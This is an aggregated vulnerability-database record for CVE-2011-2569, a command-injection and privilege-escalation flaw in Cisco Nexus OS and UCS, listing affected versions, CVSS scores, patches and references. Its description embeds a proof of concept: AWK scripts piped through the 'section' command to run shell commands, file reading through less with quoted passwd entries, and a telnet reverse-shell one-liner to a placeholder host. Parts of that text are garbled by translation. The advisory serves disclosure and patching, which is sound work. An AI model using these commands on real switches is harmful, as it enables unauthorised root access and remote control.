ID

VAR-201110-0195


CVE

CVE-2011-2569


TITLE

Cisco Nexus OS and Cisco Unified Computing System Vulnerability gained in

Trust: 0.8

sources: JVNDB: JVNDB-2011-002700

DESCRIPTION

Cisco Nexus OS (aka NX-OS) 4.2 and 5.0 and Cisco Unified Computing System with software 1.4 and 2.0 do not properly restrict command-line options, which allows local users to gain privileges via unspecified vectors, aka Bug IDs CSCtf40008, CSCtg18363, CSCtr44645, CSCts10195, and CSCts10188. The problem is Bug ID CSCtf40008 , CSCtg18363 , CSCtr44645 , CSCts10195 ,and CSCts10188 It is a problem.Authority may be obtained by local users. The Cisco Nexus Series switches are data center switches. Adopt the Cisco Nexus OS operating system. The section command is used as an AWK script to pass the request string, but the input is not fully filtered. Any command can be executed on the LINUX subsystem. nx1# sh clock | sed 's/.*/BEGIN \\{ system\\(\\\"id \"\\) \\}/' > 20110713.awk Warning: There is already a file existing with this name. Do you want to overwrite (yes/no)? [no] y nx1# sh clock | sec '* -f /bootflash /20110713.awk ' uid=2003(user) gid=504(network-operator) 11:16:04.082 UTC Wed Jul 13 2011 nx1# sh clock | sed 's/.*/BEGIN \\{ system\\(\\\"ls \\/mnt\\/cfg\\/0\\/\"\\) \\}/' > 20110713.awk nx1# sh clock | sec '* -f /bootflash/20110713.awk ' ascii bin boot cfglabel.sysmgr debug licenses linux log lost +found 11:18:41.885 UTC Wed Jul 13 2011 can be used to delete any file in the boot flash or send the 'reboot' command. In addition, the less command Han total, press the colon and press the \"e\" key to specify the file path to be opened. You can view any system file: bin:*:1:1:bin:/bin: daemon:*:2:2:daemon :/usr/sbin: sys:*:3:3:sys:/dev: ftp:*:15:14:ftp:/var/ftp:/isanboot/bin/nobash ftpuser:UvdRSOzORvz9o:99:14:ftpuser: /var/ftp:/isanboot/bin/nobash nobody:*:65534:65534:nobody:/home:/bin/sh admin:x:2002:503::/var/home/admin:/isan/bin/vsh_perm Use \"|\" (pipe) and then press the \"$\" macro key to execute the command: !ls -lah > /bootflash/20110715 You can also create a remote shell by doing the following: mknod rs p; telnet ad.dr.es. s 8888 0<rs | /bin/bash 1>rs. A local attacker can exploit these issues to execute arbitrary commands with administrative privileges. Successful exploits may compromise the affected computer. Cisco MDS, UCS, Nexus 7000, 5000, 4000, 3000, 2000, and 1000V are vulnerable; other versions may also be affected

Trust: 2.52

sources: NVD: CVE-2011-2569 // JVNDB: JVNDB-2011-002700 // CNVD: CNVD-2011-4420 // BID: 50347 // VULHUB: VHN-50514

IOT TAXONOMY

category:['Network device']sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2011-4420

AFFECTED PRODUCTS

vendor:ciscomodel:unified computing system 1.4scope: - version: -

Trust: 2.4

vendor:ciscomodel:nx-osscope:eqversion:5.0

Trust: 1.9

vendor:ciscomodel:nx-osscope:eqversion:4.2

Trust: 1.6

vendor:ciscomodel:unified computing systemscope:eqversion: -

Trust: 1.6

vendor:ciscomodel:unified computing system infrastructure and unified computing system softwarescope:eqversion:1.4\(1j\)

Trust: 1.0

vendor:ciscomodel:unified computing system infrastructure and unified computing system softwarescope:eqversion:2.0\(1q\)

Trust: 1.0

vendor:ciscomodel:nx-osscope:eqversion:4.2 and 5.0

Trust: 0.8

vendor:ciscomodel:unified computing systemscope:eqversion:with software 1.4 and 2.0

Trust: 0.8

vendor:ciscomodel:ucsscope: - version: -

Trust: 0.6

vendor:ciscomodel:mdsscope: - version: -

Trust: 0.6

vendor:ciscomodel:nexusscope:eqversion:1000v

Trust: 0.6

vendor:ciscomodel:nexusscope:eqversion:2000

Trust: 0.6

vendor:ciscomodel:nexusscope:eqversion:3000

Trust: 0.6

vendor:ciscomodel:nexusscope:eqversion:4000

Trust: 0.6

vendor:ciscomodel:nexusscope:eqversion:5000

Trust: 0.6

vendor:ciscomodel:nexusscope:eqversion:7000

Trust: 0.6

vendor:ciscomodel:unified computing systemscope:eqversion:2.0

Trust: 0.3

vendor:ciscomodel:unified computing systemscope:eqversion:0

Trust: 0.3

vendor:ciscomodel:nx-os 5.0 u1scope: - version: -

Trust: 0.3

vendor:ciscomodel:nx-os 5.0 n2scope: - version: -

Trust: 0.3

vendor:ciscomodel:nx-osscope:eqversion:5.0(3)

Trust: 0.3

vendor:ciscomodel:nx-osscope:eqversion:5.0(2)

Trust: 0.3

vendor:ciscomodel:nx-osscope:eqversion:5.0(0.54)

Trust: 0.3

vendor:ciscomodel:nx-osscope:eqversion:4.2.1

Trust: 0.3

vendor:ciscomodel:nx-osscope:eqversion:4.2(5)

Trust: 0.3

vendor:ciscomodel:nx-osscope:eqversion:4.2(4)

Trust: 0.3

vendor:ciscomodel:nx-osscope:eqversion:4.2(3)

Trust: 0.3

vendor:ciscomodel:nx-osscope:eqversion:4.2(2)

Trust: 0.3

vendor:ciscomodel:nx-osscope:eqversion:4.1(4)

Trust: 0.3

vendor:ciscomodel:nx-os 4.1 n2scope: - version: -

Trust: 0.3

vendor:ciscomodel:nx-os 4.0 n2scope: - version: -

Trust: 0.3

vendor:ciscomodel:nx-osscope:eqversion:0

Trust: 0.3

vendor:ciscomodel:nexusscope:eqversion:70000

Trust: 0.3

vendor:ciscomodel:nexusscope:eqversion:50000

Trust: 0.3

vendor:ciscomodel:nexusscope:eqversion:40000

Trust: 0.3

vendor:ciscomodel:nexusscope:eqversion:30000

Trust: 0.3

vendor:ciscomodel:nexusscope:eqversion:20000

Trust: 0.3

vendor:ciscomodel:nexusscope:eqversion:1000v0

Trust: 0.3

vendor:ciscomodel:mdsscope:eqversion:9000

Trust: 0.3

vendor:ciscomodel:mdsscope:eqversion:0

Trust: 0.3

vendor:ciscomodel:unified computing system 2.0scope:neversion: -

Trust: 0.3

vendor:ciscomodel:nx-osscope:neversion:5.2(1)

Trust: 0.3

vendor:ciscomodel:nx-os 5.1 n1scope:neversion: -

Trust: 0.3

vendor:ciscomodel:nx-osscope:neversion:5.1(1)

Trust: 0.3

vendor:ciscomodel:nx-os 5.0 u2scope:neversion: -

Trust: 0.3

vendor:ciscomodel:nx-osscope:neversion:4.2(6)

Trust: 0.3

vendor:ciscomodel:nx-os 4.2 sv1scope:neversion: -

Trust: 0.3

vendor:ciscomodel:nx-os 4.2 n2scope:neversion: -

Trust: 0.3

vendor:ciscomodel:nx-os 4.1 n2scope:neversion: -

Trust: 0.3

sources: CNVD: CNVD-2011-4420 // BID: 50347 // JVNDB: JVNDB-2011-002700 // CNNVD: CNNVD-201110-586 // NVD: CVE-2011-2569

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2011-2569
value: MEDIUM

Trust: 1.0

NVD: CVE-2011-2569
value: MEDIUM

Trust: 0.8

CNNVD: CNNVD-201110-586
value: MEDIUM

Trust: 0.6

VULHUB: VHN-50514
value: MEDIUM

Trust: 0.1

nvd@nist.gov: CVE-2011-2569
severity: MEDIUM
baseScore: 6.8
vectorString: AV:L/AC:L/AU:S/C:C/I:C/A:C
accessVector: LOCAL
accessComplexity: LOW
authentication: SINGLE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 3.1
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

VULHUB: VHN-50514
severity: MEDIUM
baseScore: 6.8
vectorString: AV:L/AC:L/AU:S/C:C/I:C/A:C
accessVector: LOCAL
accessComplexity: LOW
authentication: SINGLE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 3.1
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

sources: VULHUB: VHN-50514 // JVNDB: JVNDB-2011-002700 // CNNVD: CNNVD-201110-586 // NVD: CVE-2011-2569

PROBLEMTYPE DATA

problemtype:CWE-264

Trust: 1.9

sources: VULHUB: VHN-50514 // JVNDB: JVNDB-2011-002700 // NVD: CVE-2011-2569

THREAT TYPE

local

Trust: 0.9

sources: BID: 50347 // CNNVD: CNNVD-201110-586

TYPE

permissions and access control

Trust: 0.6

sources: CNNVD: CNNVD-201110-586

CONFIGURATIONS

sources: JVNDB: JVNDB-2011-002700

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-50514

PATCH

title:24458url:http://tools.cisco.com/security/center/viewAlert.x?alertId=24458

Trust: 0.8

title:Cisco Nexus OS 'section' and 'less' local command injection vulnerability patchesurl:https://www.cnvd.org.cn/patchInfo/show/5588

Trust: 0.6

sources: CNVD: CNVD-2011-4420 // JVNDB: JVNDB-2011-002700

EXTERNAL IDS

db:NVDid:CVE-2011-2569

Trust: 3.4

db:JVNDBid:JVNDB-2011-002700

Trust: 0.8

db:CNNVDid:CNNVD-201110-586

Trust: 0.7

db:CNVDid:CNVD-2011-4420

Trust: 0.6

db:NSFOCUSid:18029

Trust: 0.6

db:BIDid:50347

Trust: 0.4

db:PACKETSTORMid:106171

Trust: 0.1

db:VULHUBid:VHN-50514

Trust: 0.1

sources: CNVD: CNVD-2011-4420 // VULHUB: VHN-50514 // BID: 50347 // JVNDB: JVNDB-2011-002700 // CNNVD: CNNVD-201110-586 // NVD: CVE-2011-2569

REFERENCES

url:http://tools.cisco.com/security/center/viewalert.x?alertid=24458

Trust: 2.0

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2569

Trust: 0.8

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-2569

Trust: 0.8

url:http://www.securityfocus.com/archive/1/520193

Trust: 0.6

url:http://www.nsfocus.net/vulndb/18029

Trust: 0.6

url:/archive/1/520193

Trust: 0.3

url:/archive/1/520290

Trust: 0.3

sources: CNVD: CNVD-2011-4420 // VULHUB: VHN-50514 // BID: 50347 // JVNDB: JVNDB-2011-002700 // CNNVD: CNNVD-201110-586 // NVD: CVE-2011-2569

CREDITS

Peter Adkins

Trust: 0.9

sources: BID: 50347 // CNNVD: CNNVD-201110-586

SOURCES

db:CNVDid:CNVD-2011-4420
db:VULHUBid:VHN-50514
db:BIDid:50347
db:JVNDBid:JVNDB-2011-002700
db:CNNVDid:CNNVD-201110-586
db:NVDid:CVE-2011-2569

LAST UPDATE DATE

2024-08-14T14:28:15.131000+00:00


SOURCES UPDATE DATE

db:CNVDid:CNVD-2011-4420date:2011-10-25T00:00:00
db:VULHUBid:VHN-50514date:2018-10-30T00:00:00
db:BIDid:50347date:2015-03-19T08:37:00
db:JVNDBid:JVNDB-2011-002700date:2011-11-04T00:00:00
db:CNNVDid:CNNVD-201110-586date:2011-11-07T00:00:00
db:NVDid:CVE-2011-2569date:2018-10-30T16:26:47.373

SOURCES RELEASE DATE

db:CNVDid:CNVD-2011-4420date:2011-10-25T00:00:00
db:VULHUBid:VHN-50514date:2011-10-27T00:00:00
db:BIDid:50347date:2011-10-24T00:00:00
db:JVNDBid:JVNDB-2011-002700date:2011-11-04T00:00:00
db:CNNVDid:CNNVD-201110-586date:1900-01-01T00:00:00
db:NVDid:CVE-2011-2569date:2011-10-27T21:55:00.730